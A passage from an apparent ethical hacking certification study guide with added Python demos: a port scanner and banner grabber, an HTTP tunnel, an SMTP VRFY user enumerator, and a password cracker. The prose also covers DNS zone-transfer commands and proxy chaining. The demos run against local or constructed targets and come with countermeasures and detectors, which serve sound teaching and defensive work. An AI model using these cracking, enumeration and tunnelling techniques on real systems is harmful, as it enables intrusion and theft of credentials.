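            chunk = s.recv(4096)
            if not chunk:            # HTTP/1.0: the server closes after the response
                break
            chunks.append(chunk)
    raw = b"".join(chunks).decode("latin-1")
    head = raw.split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status_line, headers


def fingerprint_demo():
    httpd = HTTPServer(("127.0.0.1", 0), FakeApache)
    port = httpd.server_address[1]
    t = threading.Thread(target=httpd.serve_forever)
    t.start()
    try:
        status_root, hdr_root = grab_banner("127.0.0.1", port, "/")
        status_missing, hdr_missing = grab_banner("127.0.0.1", port, "/no-such-page")
    finally:
        httpd.shutdown()
        httpd.server_close()
        t.join()
    return {
        "root_status": status_root,
        "missing_status": status_missing,
        "server": hdr_root.get("server"),
        "server_from_error": hdr_missing.get("server"),
    }


if __name__ == "__main__":
    for key, value in fingerprint_demo().items():
        print("%-18s %s" % (key, value))
```

The countermeasure is visible in the same code: if the handler's server_version were set to a bare product name, both the normal and the error response would give the scanner nothing to match against an exploit database.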

Drawing Network Diagrams and Vulnerable Hosts

Vulnerability scanning - Identifies vulnerabilities and weaknesses of a system and network in order to determine how the system can be exploited. Scanning tools: SAINT, Nessus and Core Impact.

Network Diagrams - The physical network topology can be directly represented in a network diagram, as it is simply a diagram with network nodes and connections as undirected or directed edges (depending on the type of connection). The logical network topology can be inferred from the network diagram if details of the network protocols in use are also given.

Preparing Proxies

Proxy Server - A proxy server is a server (a computer system or an application) that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy server requesting some service, such as a file, connection, web page, or other resource available from a different server. The proxy server then evaluates the request according to its filtering rules and, if allowed, fetches the resource on the client's behalf, so the destination sees the proxy's address rather than the client's.

There are thousands of free public proxy servers that are easily found on Google. Attackers use them for scanning and attacking anonymously.

SocksChain is a program that allows a user to work with any Internet service through a chain of SOCKS or HTTP proxies to hide the real IP address.

http://www.ecotarget.com/wp-content/uploads/2011/04/ec-council-logo.jpg http://danielweis.files.wordpress.com/2011/04/ceh-v7.jpg

TOR (The Onion Routing) Proxy Chaining software Tor is a system intended to enable online anonymity. Tor client software routes Internet traffic through a worldwide volunteer networ of servers in order to conceal a user's location o r usage from someone conducting networ surveillance or traffic analysis. Using Tor ma es tracing Int ernet activity, including "visits to Web sites, online posts, instant messages and other communication for ms", to the user more difficult.[7] It is intended to protect users' personal freedom, privacy, and ab ility to conduct confidential business, by eeping their internet activities from being monitored.[8] The soft ware is open-source and the networ is free of charge to use HTTP Tunneling HTTP Tunneling is a technique by which communications performed using various networ protocols are encapsulated using the HTTP protocol, the networ protocol s in question usually belonging to the TCP/IP family of protocols. The HTTP protocol therefore acts as a wrapper for a covert channel that the networ protocol being tunneled uses to communicate. The HTTP stream with its covert channel is termed an HTTP Tunnel. HTTP Tunnel software consists of client-server HTTP Tunneling applications that integrate with existing application software, permitting them to be used in conditions of restricted net wor connectivity including firewalled networ s and networ s behind proxy servers. SSH tunneling A Secure Shell (SSH) tunnel consists of an encrypted tunnel created through a SS H protocol connection. Users may set up SSH tunnels to transfer unencrypted traffi c over a networ through an encrypted channel.

To set up an SSH tunnel, one configures an SSH client to forward a specified local port to a port on the remote machine. Once the SSH tunnel has been established, the user can connect to the specified local port to access the network service. The local port need not have the same port number as the remote port.

SSH tunnels provide a means to bypass firewalls that prohibit certain Internet services, so long as the site allows outgoing SSH connections. For example, an organization may prohibit a user from accessing Internet web pages (port 80) directly without passing through the organization's proxy filter (which gives the organization a means of monitoring and controlling what the user sees on the web). Users who do not want their web traffic monitored or blocked by that proxy filter, and who can connect to an external SSH server, can create an SSH tunnel that forwards a given port on their local machine to port 80 on a remote web server. To reach the remote web server they then point the browser at the local port, for example http://localhost:<local port>/ (or simply http://localhost/ if the local port is 80). From the defender's side, this is why outbound SSH, and outbound TCP in general, should be limited to the hosts that need it.

SSL Proxy
You probably know secure HTTP from secure websites. Say you want to operate a secure web server but only have an ordinary server. SSL Proxy can be your solution: it is plugged into the connection between the client and the server and adds Secure Sockets Layer (SSL) support. Or the other way around: you have an ordinary telnet client but want to connect to a secure site. Just start SSL Proxy with the appropriate parameters and you are good to go. That is what SSL Proxy can do for you.

Understanding Anonymizers
An anonymizer, or anonymous proxy, is a tool that attempts to make activity on the Internet untraceable. It is a proxy server that acts as an intermediary and privacy shield between a client computer and the rest of the Internet. It accesses the Internet on the user's behalf, protecting personal information by hiding the client computer's identifying information. Note that the anonymizer's operator sees both the full traffic and the real client address, so it moves the trust problem rather than removing it.
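The HTTP tunneling technique described above, as an added example that is not part of the original study guide: the client wraps each chunk of an arbitrary byte stream (here a constructed SMTP fragment) in a POST request that any web proxy will relay, and the tunnel endpoint strips the HTTP framing off again. The host name tunnel.example.com, the path /sync and the X-Seq header are assumptions made for this illustration, not a real service or a standard.

```python
"""Minimal HTTP tunnel framing: carry an arbitrary byte stream inside HTTP POST bodies."""
import re

# Constructed values: placeholders for this example, not real infrastructure.
TUNNEL_HOST = "tunnel.example.com"
TUNNEL_PATH = "/sync"


def http_wrap(payload: bytes, seq: int) -> bytes:
    """Encapsulate one chunk of tunneled traffic as a POST that an HTTP proxy will pass along."""
    headers = (
        f"POST {TUNNEL_PATH} HTTP/1.1\r\n"
        f"Host: {TUNNEL_HOST}\r\n"
        "Content-Type: application/octet-stream\r\n"
        f"X-Seq: {seq}\r\n"
        f"Content-Length: {len(payload)}\r\n"
        "\r\n"
    )
    return headers.encode("ascii") + payload


def http_unwrap(data: bytes) -> tuple:
    """Parse one wrapped request; return (seq, payload, unconsumed bytes).

    Raises ValueError if the body is shorter than Content-Length claims, so a caller
    reading from a socket knows it must wait for more data instead of truncating the
    tunneled stream silently.
    """
    head, sep, body = data.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete headers")
    m = re.search(rb"^Content-Length:\s*(\d+)\s*$", head, re.M | re.I)
    if not m:
        raise ValueError("no Content-Length header")
    length = int(m.group(1))
    if len(body) < length:
        raise ValueError("short body")
    s = re.search(rb"^X-Seq:\s*(\d+)\s*$", head, re.M | re.I)
    seq = int(s.group(1)) if s else 0
    return seq, body[:length], body[length:]


def tunnel_stream(chunks: list) -> bytes:
    """Simulate the wire: wrap every chunk client-side, concatenate, unwrap at the far end."""
    wire = b"".join(http_wrap(c, i) for i, c in enumerate(chunks))
    out = []
    while wire:
        _seq, payload, wire = http_unwrap(wire)
        out.append(payload)
    return b"".join(out)


if __name__ == "__main__":
    # Constructed sample: an SMTP dialogue that a firewall blocking outbound port 25 would otherwise stop.
    smtp = [b"EHLO attacker\r\n", b"MAIL FROM:<a@example.org>\r\n"]
    print(http_wrap(smtp[0], 0).decode())
    print(tunnel_stream(smtp) == b"".join(smtp))
```

On the wire the tunnel looks like a client repeatedly posting small binary uploads to one host, which is exactly what a proxy log should be searched for: many POSTs with application/octet-stream bodies to a host nobody browses.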


IP Address Spoofing
IP address spoofing, or IP spoofing, is the creation of Internet Protocol (IP) packets with a forged source IP address, with the purpose of concealing the identity of the sender or impersonating another computing system. Because any reply goes to the forged address, spoofing is mainly useful for one-way traffic (flooding, some UDP services, blind scans) rather than for attacks that need a completed TCP handshake.

Scanning Countermeasures
Ethical hackers use their tool set to test the scanning countermeasures that have been implemented. Once a firewall is in place, a port-scanning tool should be run against hosts on the network to determine whether the firewall correctly detects and stops the port scanning activity. The firewall should be able to detect the probes sent by port-scanning tools. The firewall should carry out stateful inspection, which means it tracks the state of each connection rather than judging every packet by its header alone, and passes only traffic that belongs to a permitted connection. A network IDS should be used to identify the OS-detection methods used by common hacker tools such as Nmap. Only needed ports should be kept open; the rest should be filtered or blocked. The staff of the organization using the systems should be given appropriate training in security awareness.
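The detection side of the countermeasure above, as an added example that is not part of the original study guide: a sliding-window check over firewall deny logs that flags a source which probes many distinct ports on one host in a short time. The log format and the addresses are constructed for this illustration (the addresses come from the RFC 5737 documentation ranges); real firewalls log in their own formats, so only the regular expression would change.

```python
"""Flag port-scan behaviour in constructed firewall deny logs: one source hitting many distinct ports quickly."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log in a hypothetical format; 203.0.113.5 is the scanner, the others are noise.
SAMPLE_LOG = """\
2011-04-05T10:00:01 DROP TCP 203.0.113.5:44001 -> 192.0.2.10:21
2011-04-05T10:00:01 DROP TCP 203.0.113.5:44002 -> 192.0.2.10:22
2011-04-05T10:00:02 DROP TCP 203.0.113.5:44003 -> 192.0.2.10:23
2011-04-05T10:00:02 DROP TCP 203.0.113.5:44004 -> 192.0.2.10:25
2011-04-05T10:00:03 DROP TCP 203.0.113.5:44005 -> 192.0.2.10:80
2011-04-05T10:00:03 DROP TCP 203.0.113.5:44006 -> 192.0.2.10:110
2011-04-05T10:00:05 DROP TCP 198.51.100.7:51000 -> 192.0.2.10:445
2011-04-05T10:05:00 DROP TCP 198.51.100.7:51001 -> 192.0.2.10:3389
2011-04-05T10:00:04 ACCEPT TCP 198.51.100.9:51500 -> 192.0.2.10:443
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>\w+) (?P<proto>\w+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse(log: str):
    """Yield (timestamp, action, src, dst, dport); lines that do not match the format are skipped."""
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        yield datetime.fromisoformat(m["ts"]), m["action"], m["src"], m["dst"], int(m["dport"])


def detect_scans(log: str, window_s: int = 10, min_ports: int = 5) -> dict:
    """Return {src: sorted distinct ports probed} for every source that touched at least
    min_ports distinct destination ports on one host within some window_s-second window.
    Only denied packets count: a scan against a filtered host is all drops."""
    events = defaultdict(list)  # (src, dst) -> [(timestamp, dport), ...]
    for ts, action, src, dst, dport in parse(log):
        if action.upper() != "DROP":
            continue
        events[(src, dst)].append((ts, dport))

    flagged = {}
    window = timedelta(seconds=window_s)
    for (src, dst), hits in events.items():
        hits.sort()
        lo = 0
        for hi in range(len(hits)):
            while hits[hi][0] - hits[lo][0] > window:   # slide the window forward
                lo += 1
            if len({p for _, p in hits[lo:hi + 1]}) >= min_ports:
                flagged[src] = sorted({p for _, p in hits})
                break
    return flagged


if __name__ == "__main__":
    print(detect_scans(SAMPLE_LOG))
```

The thresholds are the tuning knobs: a slow scan spreads its probes over hours, so a second pass with a long window and a low port count (as the test below does) is what catches it, at the price of more false positives from chatty legitimate clients.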


War Dialing Countermeasures
War dialing is the technique of using a special program with a modem to automatically dial a list of telephone numbers, usually every number in a local exchange, to search for computers that answer. When hackers target companies, one of the first things they do is war dial the exchange near the company. Companies rarely control dial-in ports as strictly as the firewall, and machines with attached modems are sprinkled throughout the company on people's desktop computers and on special-purpose computers that communicate with partners. Countermeasures are to inventory the organization's phone lines and remove unauthorized modems, to require call-back or strong authentication on any dial-in that must remain, and to watch the PBX for the sequential dialing pattern a war dialer produces.
War dialing tools: WarVOX, PhoneSweep, ToneLoc
Tool to detect war dialing: Sandtrap

Scanning Pen Testing
1. Perform host discovery (Nmap, Angry IP Scanner, etc.)
2. Perform port scanning (Nmap, Netscan, UDP Scanner, etc.)
3. Perform banner grabbing / OS fingerprinting (Telnet, Netcraft, error pages, etc.)
4. Scan for vulnerabilities (SAINT, Core Impact, Nessus)
5. Draw network diagrams (LAN Surveyor, Ipsonar)
6. Prepare proxies (Proxifier, SocksChain, SSL Proxy)
7. Document all findings
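Steps 2 and 3 of the procedure above (port scanning, then banner grabbing), as an added example that is not part of the original study guide. The block does a TCP connect scan, the same thing Nmap's -sT does, and reads the greeting a service volunteers. The target is a throwaway listener the block starts on 127.0.0.1 with a constructed SMTP-style banner, so it runs offline; the hostname in that banner is made up.

```python
"""TCP connect scan and banner grab (steps 2-3 of the scanning procedure) against a local demo listener."""
import socket
import threading

DEMO_BANNER = b"220 mail.example.test ESMTP ready\r\n"   # constructed banner, not a real host


def start_demo_listener(banner: bytes = DEMO_BANNER) -> int:
    """Constructed target: a service on 127.0.0.1 that greets every client with a banner. Returns its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            try:
                with conn:
                    conn.sendall(banner)
            except OSError:
                pass  # scanner closed before reading the banner; keep serving

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def find_closed_port() -> int:
    """Pick a loopback port nothing is listening on, by binding it and releasing it again."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as tmp:
        tmp.bind(("127.0.0.1", 0))
        return tmp.getsockname()[1]


def connect_scan(host: str, ports, timeout: float = 0.5) -> dict:
    """Full-handshake scan: port -> 'open', 'closed' (RST came back) or 'filtered' (no answer).
    Completing the handshake is noisy: the target's application logs see every probe."""
    results = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
                results[port] = "open"
            except ConnectionRefusedError:
                results[port] = "closed"
            except (socket.timeout, OSError):
                results[port] = "filtered"
    return results


def grab_banner(host: str, port: int, timeout: float = 1.0) -> str:
    """Read whatever the service says before we send anything; SMTP, FTP and SSH all announce themselves."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            return s.recv(256).decode(errors="replace").strip()
        except socket.timeout:
            return ""  # silent service (HTTP, for one): fall back to a protocol-specific probe


if __name__ == "__main__":
    target_port = start_demo_listener()
    print(connect_scan("127.0.0.1", [target_port, find_closed_port()]))
    print(grab_banner("127.0.0.1", target_port))
```

A "filtered" verdict is the firewall doing its job from the scanner's point of view; from the defender's, the difference between refusing (RST) and silently dropping is whether the attacker learns that a host exists at all.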


Module 4 Enumeration Study Guide

Objectives:
- Enumeration Defined
- Techniques for Enumeration
- NetBIOS Enumeration
- User Account Enumeration
- SNMP Enumeration
- Unix/Linux Enumeration
- LDAP / Active Directory
- NTP Enumeration
- SMTP and DNS Enumeration
- Enumeration Countermeasures

Enumeration Defined
Enumeration is the process of extracting user names, machine names, network resources, shares and lists of services from a target environment. This step in the methodology is often carried out along with scanning; unlike footprinting, it involves active connections to the target's systems, so it is logged and can be detected. As information comes in from your various tests and sources it is imperative to document everything. Enumeration often comes into play when a hacker has worked their way into a position on the network, such as on an intranet.

Techniques for Enumeration
The techniques listed below are used to gather user-name or network-device information. To build a clearer picture of a target, multiple methods are commonly used together.

NetBIOS Enumeration
NetBIOS is an older session-layer interface for communication over a network; it is still commonly carried over TCP/IP (name service on UDP 137, session service on TCP 139). The name service keeps a list of the computers that belong to a domain or workgroup. If the services in use expose NetBIOS names, this may allow a hacker to create a list of the computers on the network. For example, once credentials are available, the psexec tool can be used to collect ipconfig output from every computer in the domain.

User Account Enumeration
Creating a list of user accounts is often necessary for a hacker. User accounts can be found on a local machine or in a domain structure, and a list of valid names turns a blind password attack into a targeted one.

SNMP Enumeration
The Simple Network Management Protocol is used to remotely monitor and manage devices on a TCP/IP network (UDP 161). Using this protocol an attacker can extract information such as interfaces, routing tables, running processes and user names, especially if the default "public" (read) and "private" (read/write) community strings are still in use. In SNMP versions 1 and 2c the community string is the only authentication and it travels in cleartext, so it can also be sniffed; SNMPv3 adds authentication and encryption. Most network monitoring software can be used in this manner.

Unix/Linux Enumeration
These systems have some standard commands for finding information on the network. The showmount command lists the directories an NFS server exports. The finger command can be used to list user, host and other information on a system. rpcclient (from Samba) can enumerate domain users and shares over SMB, and rpcinfo lists the RPC services a host has registered.

LDAP Enumeration
The Lightweight Directory Access Protocol (TCP 389, or 636 over SSL/TLS) is the method used to query directory services such as Active Directory. Using a tool such as JXplorer a hacker can bind to a directory and read its contents in a very manageable form; if the directory permits anonymous binds, no credentials are needed to list users, groups and computers.

NTP Enumeration
Using the Network Time Protocol on UDP 123, computers on a network can be kept in sync with an NTP server. Tools can scan to determine whether this port is open on target systems and then query the server (with ntptrace or ntpq, for example) for its peers and, on older servers, for the list of hosts that recently synchronized with it, which reveals internal addresses.

SMTP Enumeration
The Simple Mail Transfer Protocol was not built with security in mind. Accessing a server with SMTP port 25 open can be a very simple process. The SMTP server gives feedback about addresses as they are presented to it: the VRFY command asks whether a user exists, EXPN expands a mailing list, and RCPT TO: can be used to test addresses one at a time when the first two are disabled. This can be used to verify newly found email addresses or to enumerate user names.

DNS Enumeration
The Domain Name System translates the host names that humans understand into the IP addresses that devices use on a network, and back again. If configured incorrectly, an attacker can use this service to enumerate all the systems in a zone by requesting a zone transfer (AXFR). From the command line the syntax is: host -l <domain name> <IP address or DNS name of the DNS server>. The nslookup command (ls -d <domain> in its interactive mode) and dig (dig axfr <domain> @<server>) can also be used to enumerate hosts.

Enumeration Countermeasures
As always, run only the services a system needs. If you do not need SNMP, NTP, SMTP or LDAP, keep them disabled. Always change default passwords and community strings, even on network devices such as routers, switches and gateways. Restrict the information that anonymous connections can obtain (null sessions on Windows, anonymous LDAP binds). Disable or restrict the SMTP VRFY and EXPN commands, and test the configuration of DNS and SMTP servers to ensure they are configured properly and that zone transfers are accepted only from the authorized secondary name servers.
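The SMTP VRFY exchange described above, with both sides of the conversation, as an added example that is not part of the original study guide. The server is a constructed in-process responder (the host name mail.example.test and the account list are made up), run once permissively and once the way a hardened server behaves: the 252 reply is the one RFC 5321 defines for a server that will not verify users, and Postfix produces it when disable_vrfy_command = yes is set.

```python
"""SMTP VRFY user enumeration against a constructed in-process mail server, permissive and hardened."""
import socket
import threading

KNOWN_USERS = {"alice", "bob"}   # constructed: the accounts the fake server knows about


def start_fake_smtp(verify_enabled: bool) -> int:
    """Tiny SMTP responder on 127.0.0.1. With verify_enabled=False it answers VRFY the way a hardened
    server does: the same 252 reply for every name, so nothing can be learned. Returns the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def handle(conn):
        try:
            with conn, conn.makefile("rb") as rfile:
                conn.sendall(b"220 mail.example.test ESMTP\r\n")
                for raw in rfile:
                    cmd, _, arg = raw.decode(errors="replace").strip().partition(" ")
                    cmd = cmd.upper()
                    if cmd in ("HELO", "EHLO"):
                        conn.sendall(b"250 mail.example.test\r\n")
                    elif cmd == "VRFY":
                        if not verify_enabled:
                            conn.sendall(b"252 2.5.2 Cannot VRFY user, but will accept message\r\n")
                        elif arg.lower() in KNOWN_USERS:
                            conn.sendall(f"250 {arg}@example.test\r\n".encode())
                        else:
                            conn.sendall(b"550 5.1.1 User unknown\r\n")
                    elif cmd == "QUIT":
                        conn.sendall(b"221 Bye\r\n")
                        return
                    else:
                        conn.sendall(b"502 Command not implemented\r\n")
        except OSError:
            pass  # client went away mid-session

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def vrfy_enumerate(host: str, port: int, candidates) -> dict:
    """Attacker side: HELO, then VRFY each candidate; map name -> 'valid', 'invalid' or 'blocked'."""
    results = {}
    with socket.create_connection((host, port), timeout=3) as s, s.makefile("rb") as rfile:
        rfile.readline()                               # 220 banner
        s.sendall(b"HELO scanner.example.test\r\n")
        rfile.readline()                               # 250
        for name in candidates:
            s.sendall(f"VRFY {name}\r\n".encode())
            code = rfile.readline()[:3]
            results[name] = {b"250": "valid", b"550": "invalid"}.get(code, "blocked")
        s.sendall(b"QUIT\r\n")
    return results


if __name__ == "__main__":
    print(vrfy_enumerate("127.0.0.1", start_fake_smtp(True), ["alice", "mallory"]))
    print(vrfy_enumerate("127.0.0.1", start_fake_smtp(False), ["alice", "mallory"]))
```

Disabling VRFY only closes this door; a server that rejects RCPT TO: for unknown recipients during the session still leaks the same information one address at a time, which is why rate limiting and monitoring of many-recipient-failures per client matter as well.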


Module 5 System Hacking Study Guide

Objectives:
- Introduction to System Hacking
- Password Cracking
- Password Cracking Techniques
- Types of Password Attacks
- Automatic Password Cracking Algorithm
- Privilege Escalation
- Executing Applications
- Keylogger
- Spyware
- Rootkits
- Detecting Rootkits
- NTFS Data Stream
- What is Steganography
- Steganalysis
- Covering Tracks

Introduction to System Hacking
Stages of hacking and where System Hacking comes in:
1. Footprinting - IP ranges, namespace, employee web usage
2. Scanning - target assessment, identification of services, identification of systems
3. Enumeration - intrusive probing, user lists, security flaws
4. System Hacking -
   a) Gaining access (cracking passwords, escalating privileges)
   b) Maintaining access (executing applications, hiding files)
   c) Clearing logs (covering tracks)

Password Cracking
Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. Password length and complexity are crucial in the defense against password cracking, as is storing only a slow, salted hash rather than anything the password can be recovered from.

Password Cracking Techniques
Dictionary Attacks - A dictionary attack successively tries every word in a pre-arranged list called a dictionary. It tries only those possibilities which are most likely to succeed, typically taken from a list of words (hence the name), a bible, or lists of previously leaked passwords. Dictionary attacks generally succeed because many people choose passwords that are short (7 characters or fewer) or are ordinary words.

Brute Forcing Attacks, or exhaustive key search, is a strategy that can in theory be used against any hashed or encrypted data by an attacker who is unable to take advantage of any weakness in the system that would otherwise make the task easier. It involves systematically checking all possible keys (or passwords) until the correct one is found. The cost grows exponentially with password length, which is why length does more for a password than any single special character.

Syllable Attack - a combination of brute force and dictionary attacks, useful when the password is not a dictionary word but is assembled from syllables or word fragments.
Rule-based Attack - used when the attacker has gained some information about the password, usually following enumeration that identified the password policy in place (minimum length, required character classes). This allows the attacker to customize the cracking tools so they generate only candidates the policy would have accepted.
Hybrid Attack - builds on the dictionary attack by adding numerals and symbols to dictionary words (password1, Summer2011!), which is how most users satisfy complexity rules.

Types of Password Attacks
Passive Online Attacks
Wire Sniffing - packet sniffing tools can be run on a LAN to access and record raw network traffic, capturing credentials, or authentication hashes that can be cracked offline, from protocols that send them in the clear.
Active Online Attacks
Man-in-the-Middle (MITM) attack - a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.

Replay Attack - an authentication session is captured by a sniffer, then replayed by the attacker to fool a computer into granting access. Protocols defend against this with nonces, timestamps or by binding the authentication to the session.
Trojans/Spyware/Keyloggers
a) Trojans can be used to gain access to computers and "phone home" to an attacker, giving them remote control of the system
b) Spyware is a type of malware that can be installed on computers to collect pieces of information about users without their knowledge
c) Keyloggers are a type of spyware that runs in the background and records keystrokes
Hash Injection Attack (pass-the-hash) - an attacker injects a compromised hash into a local session and uses the hash to authenticate to network resources. Challenge/response protocols such as NTLM only prove possession of the hash, so the cleartext password is never needed.
Rainbow Attacks: Pre-computed Hashes
1. Rainbow table - a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes; hash chains are stored instead of every hash, trading lookup time for a much smaller table
2. Computed hashes - the hashes of a list of possible passwords are computed once and stored in the table
3. Compare the hashes - it is then easy to recover passwords by looking up captured password hashes in the precomputed table. A per-user salt defeats this, because every salt value would need its own table.
Distributed Network Attack (DNA) - a technique used to recover password-protected files. In the past, recoveries were limited to the processing power of one machine. DNA uses the power of machines across the network, or across the world, to crack the passwords.
Non-Electronic Attacks
Social Engineering - the art of manipulating people into performing actions or divulging confidential information, in contrast to breaking in or using technical cracking techniques.
Shoulder Surfing - unauthorized viewing of either the user's keyboard or screen while he or she is logging in.
Dumpster Diving - searching for sensitive information in residential or commercial trash bins, printer trash bins, or at a user's desk.

Automatic Password Cracking Algorithm
1. Find a valid user
2. Find the hashing (or encryption) algorithm used
3. Obtain the stored hashes
4. Create a list of possible passwords
5. Hash each candidate with the same algorithm
6. See if there is a match for each user ID
7. Repeat steps 1 through 6
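The algorithm above carried through in code, and with it the precomputed-table attack from the rainbow section, as an added example that is not part of the original study guide. The dumped hashes, the wordlist and the user names are constructed; the stored form is plain unsalted SHA-256, which stands in for the weak storage the text describes. The same helper serves dictionary, hybrid (rule-based) and brute-force candidate generation, and the last step shows why a salt makes the precomputed table useless.

```python
"""Offline password cracking against constructed hashes: dictionary, hybrid rules, brute force, and a
precomputed lookup table that a per-user salt defeats."""
import hashlib
import itertools
import string


def sha256_hex(s: str) -> str:
    return hashlib.sha256(s.encode()).hexdigest()


# Constructed wordlist and constructed "dumped" hashes (unsalted SHA-256, as a weak system might store them).
WORDLIST = ["password", "letmein", "summer", "welcome", "dragon"]
TARGETS = {
    "alice": sha256_hex("summer"),        # plain dictionary word
    "bob": sha256_hex("Dragon2011!"),     # dictionary word mangled to satisfy a complexity policy
    "carol": sha256_hex("zq7"),           # random, but short enough to brute-force
}
BRUTE_ALPHABET = string.ascii_lowercase + string.digits


def hybrid_candidates(words):
    """Step 4: dictionary words first, then rule-based mutations (case, digit and year suffixes, a symbol)."""
    for w in words:
        yield w
        for base in (w, w.capitalize(), w.upper()):
            yield base
            for suffix in ("1", "123", "2011", "2011!", "!"):
                yield base + suffix


def brute_candidates(alphabet: str, max_len: int):
    """Exhaustive search over short strings; the number of candidates is sum(|alphabet|**n)."""
    for n in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=n):
            yield "".join(combo)


def crack(targets: dict, candidates, hash_fn=sha256_hex) -> dict:
    """Steps 5-7: hash each candidate once and match it against every user's stored hash at the same time.
    Unsalted storage is what makes this one-hash-checks-all-users trick possible."""
    by_hash = {h: user for user, h in targets.items()}
    found = {}
    for candidate in candidates:
        user = by_hash.get(hash_fn(candidate))
        if user is not None and user not in found:
            found[user] = candidate
            if len(found) == len(targets):
                break
    return found


def build_lookup_table(candidates, hash_fn=sha256_hex) -> dict:
    """Precomputation: the hashing work is done once, up front, and reused against any future dump."""
    return {hash_fn(c): c for c in candidates}


def salted_hash(password: str, salt: str) -> str:
    """Salted storage: the same password yields a different hash per user, so one table fits no one."""
    return sha256_hex(salt + password)


if __name__ == "__main__":
    print(crack(TARGETS, hybrid_candidates(WORDLIST)))
    print(crack(TARGETS, brute_candidates(BRUTE_ALPHABET, 3)))
    table = build_lookup_table(hybrid_candidates(WORDLIST))
    print(table.get(TARGETS["alice"]))                   # instant hit from the precomputed table
    print(table.get(salted_hash("summer", "x9Qp")))      # None: the salt changed the hash
```

The brute-force pass over three lowercase-plus-digit characters is under 50,000 hashes; each extra character multiplies that by 36, which is the whole argument for length over complexity in the text above. A deliberately slow hash (bcrypt, PBKDF2) multiplies every one of those guesses again.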

The vulnerability does not arise from the hashing process but from the storage. Most systems do not "decrypt" the stored password during authentication but store a one-way hash. During the login process the password entered is run through the algorithm, generating a one-way hash that is compared to the hash stored on the system. If they are the same, it is assumed the proper password was supplied. Therefore all an attacker has to do in order to crack a password is obtain a copy of the one-way hash stored on the server and then run the same algorithm over candidate passwords until a hash matches. Slow hashes (bcrypt, PBKDF2) and per-user salts raise the cost of every guess and force the attacker to work each user separately.

Privilege Escalation
Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions. Vertical escalation gains higher privileges (user to administrator or root); horizontal escalation gains the access of another user at the same level.

Executing Applications
Attackers execute malicious applications at this stage. This is called "owning" the system.

Keylogger
Keystroke logging is the action of tracking (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored. There are numerous keylogging methods, ranging from hardware and software-based approaches to electromagnetic and acoustic analysis.

Spyware
Spyware is a type of malware that can be installed on computers and which collects small pieces of information about users without their knowledge. The presence of spyware is typically hidden from the user and can be difficult to detect. Typically, spyware is secretly installed on the user's personal computer. Sometimes, however, spyware such as a keylogger is installed by the owner of a shared, corporate or public computer on purpose in order to secretly monitor other users. Spyware programs can collect various types of personal information, such as Internet surfing habits and sites that have been visited, but can also interfere with user control of the computer in other ways, such as installing additional software and redirecting web browser activity. Spyware is known to change computer settings, resulting in slow connection speeds, different home pages, and loss of Internet connection or of the functionality of other programs.

Rootkits
Rootkits are programs, running in user mode or in the kernel, that have the ability to hide themselves and cover up traces of their activities. They replace certain operating system calls and utilities with their own modified versions of those routines. Kernel rootkits can be especially difficult to detect and remove because they operate at the same security level as the operating system itself, and are thus able to intercept or subvert the most trusted operating system operations. Any software, such as antivirus software, running on the compromised system is equally vulnerable.[30] In this situation no part of the system can be trusted. The attacker first acquires root or administrator access to the system, by exploiting it directly or by way of a virus, Trojan or spyware, and then installs the rootkit; rootkits allow the attacker to maintain hidden access to the system.

Detecting Rootkits
Integrity-based detection - compares a snapshot of file systems, boot records or memory with a known trusted baseline
Signature-based detection - compares characteristics of all system processes and executable files with a database of known rootkit fingerprints
Heuristic detection - looks for deviations from normal system patterns and behavior to find unidentified rootkits based on their execution path
Cross-view-based detection - compares "trusted" raw data (the disk or kernel structures read directly) with the "tainted" content returned by an API (Application Programming Interface); a hidden file or process shows up in one view but not the other
All of these run on the suspect machine, so a rootkit that hooks what they read can feed them clean answers. Booting from known-good media and examining the disk offline is the reliable check.
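Integrity-based detection from the list above, as an added example that is not part of the original study guide: hash every file under a root into a baseline, then diff a later snapshot against it and report modified, added and removed files. The demo builds a constructed sbin/ directory in a temporary location, "trojans" ps, drops a hidden binary and deletes netstat; the file names and contents are made up. The baseline in a real deployment is taken at install time and stored off the host, and, as the cross-view point above warns, a kernel rootkit that hooks file reads can still hand this checker the original bytes.

```python
"""Integrity-based detection: hash every file under a root into a baseline, then diff a later snapshot against it."""
import hashlib
import os
import tempfile


def snapshot(root: str) -> dict:
    """Map relative path (forward slashes) -> SHA-256 of contents for every regular file under root.
    Symlinks are skipped so a planted link cannot steer the scan outside root or stand in for a file."""
    result = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if not os.path.islink(os.path.join(dirpath, d))]
        for name in filenames:
            full = os.path.join(dirpath, name)
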